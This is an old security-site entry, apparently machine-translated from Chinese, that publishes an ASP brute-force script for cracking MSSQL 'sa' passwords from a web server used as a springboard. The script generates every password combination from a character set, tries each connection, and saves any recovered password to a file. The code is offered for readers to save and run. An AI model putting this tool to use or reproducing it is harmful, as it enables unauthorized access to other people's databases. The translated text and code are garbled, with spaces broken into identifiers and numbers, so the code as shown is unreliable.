MSSQL Cracker in ASP-vulnerability warning-the black bar safety net

2006-09-21T00:00:00
ID MYHACK58:62200611847
Type myhack58
Reporter 佚名
Modified 2006-09-21T00:00:00

Description

A violence to crack the MSSQL user's password in the ASP program, the earliest published in the EST Forum. Following this version is can running after closing the browser, the Run is completed will be in the current directory to generate a result file. Use ASP to do things efficiency is very slow, of course, this program embodies not its efficiency, but...... Give you a little suspense, or more boring, Oh.

Yourself put the following code saved as ASP file. Of course I still continue to BS those only change the author name of the guy.

<% '============ ASP Port Scanner by lake2=================== 'http://lake2.0x54.org 'Version: 0.1 'For SpringBoard '========================================================== %> <style type="text/css"> body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;} body {background-color: #ffffff;font-size:14px; } a:link {color: #0000FF;text-decoration: none;} a:visited {text-decoration: none;color: #0000FF;} a:hover {text-decoration: none;color: #FF0000;} a:active {text-decoration: none;color: #FF0000;} . buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5} . TextBox {border: 1px solid #084B8E} . styleRed {color: #FF0000} </style> <title>MSSQL Cracker for SpringBoard</title> <% Dim Password() If Request. Form("go") <> "1" Then %> <div align="center">Welcome to <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a> </div> <form name="form1" method="post" action="" > ConnStr: <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB. 1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="7 0"> <br> Char: <input name="char" type="text" class="TextBox" id="char" value="0 1 2 3 4 5 6 7 8 9" size="3 0"> <br> Length: <input name="len" type="text" class="TextBox" id="len" value="3" size="4"> <br> Path: <input name="path" type="text" class="TextBox" value="<%=Server. MapPath("r.txt")%>" size="5 0"> <input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked> Enablel<br> <input name="go" type="hidden" id="go" value="1"> <br> <input name="Submit" type="submit" class="buttom" id="Submit" value=" Run "> </form> <% Else timer1 = timer Server. ScriptTimeout = 7 7 7 6 0 0 0 ConnStr = Request. Form("Conn") Char = request. Form("char") LenChar = Len(Char) ReDim password(LenChar) For i = 1 to LenChar password(i) = Mid(Char, i, 1) Next length = CInt(request. Form("len")) Call LAKE("") response. Write "Done!& lt;br>Process "& tTime & "s" If request. Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime) End If

Sub LAKE(str) If Len(str) >= length Then Exit Sub For j = 1 to LenChar pass = str &password(j) If Len(pass) = length Then Call Crack(pass) Call LAKE(pass) Next End Sub

Sub Crack(str) On Error Resume Next Set conn = Server. CreateObject("ADODB. connection") conn. open Replace(ConnStr,"{PASS}",str) If Err Then If Err. Number <> -2147217843 Then response. Write(Err. Description & "<BR>") response. End() End If Else response. Write("I Get it ! The Password is <font color=red>" & str & "</font><BR>Process "& tTime & "s") If request. Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime) response. End() End If End Sub

Function tTime() timer2 = timer thetime=cstr(int(timer2-timer1)) tTime = thetime End Function

Sub CreateResult(t) Set fs = CreateObject("Scripting. FileSystemObject") Set outfile = fs. CreateTextFile(request. Form("path")) outfile. WriteLine t Set fs = Nothing End Sub %>